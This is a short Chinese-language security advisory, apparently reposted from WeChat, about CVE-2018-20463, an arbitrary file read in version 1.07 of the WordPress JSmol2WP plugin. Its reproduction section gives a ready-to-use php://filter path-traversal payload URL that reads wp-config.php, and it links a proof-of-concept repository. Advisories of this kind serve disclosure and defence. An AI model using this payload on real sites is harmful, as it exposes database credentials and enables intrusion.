( CVE-2018-20463) WordPress JSmol2WP Plugin 安全漏洞

admin 2023年3月8日09:20:32评论81 views字数 583阅读1分56秒阅读模式

01

漏洞简介


     WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。JSmol2WP Plugin是使用在其中的一个支持查看3D化学结构的插件。
    WordPress JSmol2WP Plugin 1.07版本中存在安全漏洞。攻击者可利用该漏洞读取任意文件。


02

影响范围


WordPress JSmol2WP Plugin 1.07


03

漏洞复现


payload:/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

( CVE-2018-20463) WordPress JSmol2WP Plugin 安全漏洞

POC:

https://github.com/Henry4E36/CVE-2018-20463


04

修复建议



     

目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:

https://wordpress.org/plugins/jsmol2wp/



本文章仅用于学习交流,不得用于非法用途


( CVE-2018-20463) WordPress JSmol2WP Plugin 安全漏洞


原文始发于微信公众号(才疏学浅的H6):( CVE-2018-20463) WordPress JSmol2WP Plugin 安全漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月8日09:20:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ( CVE-2018-20463) WordPress JSmol2WP Plugin 安全漏洞https://cn-sec.com/archives/1247521.html

发表评论

匿名网友 填写信息